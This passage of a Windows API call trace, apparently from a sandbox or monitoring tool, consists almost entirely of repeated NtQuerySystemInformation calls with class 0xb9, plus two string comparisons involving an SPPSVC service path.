(SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0239.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.674] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.682] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 